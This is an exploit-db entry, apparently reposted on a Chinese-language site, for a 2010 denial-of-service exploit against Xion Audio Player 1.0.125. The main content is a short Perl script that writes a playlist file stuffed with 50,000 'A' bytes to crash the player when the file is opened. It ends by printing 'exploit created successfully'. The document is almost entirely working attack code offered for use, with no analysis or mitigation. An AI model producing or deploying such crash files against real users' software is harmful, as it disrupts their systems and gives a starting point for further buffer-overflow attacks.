Xion Audio Player 1.0.125 – Denial of Service

  • 作者: s-dz
    日期: 2010-07-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14517/
  • #!/usr/bin/perl
    # Xion Audio Player version: 1.0.125
    # Author: hadji samir, s-dz@hotmail.fr
    # Download : http://xion.r2.com.au/index.php?page=download
    # Tested : Windows XP SP2 (fr)
    # DATE : 2010-07-31
    #
    #thanks mo3tazwnass cfa nta3 blida
    #
    #et samir tjrs mahboul-3lik
    #
    ################################################################### 
    
    my $file= "mahboul-3lik00.m3u";
    
    my $junk= "\x41" x50000;
     
    open($FILE, ">$file");
    print($FILE $junk);
    close($FILE);
    print("exploit created successfully");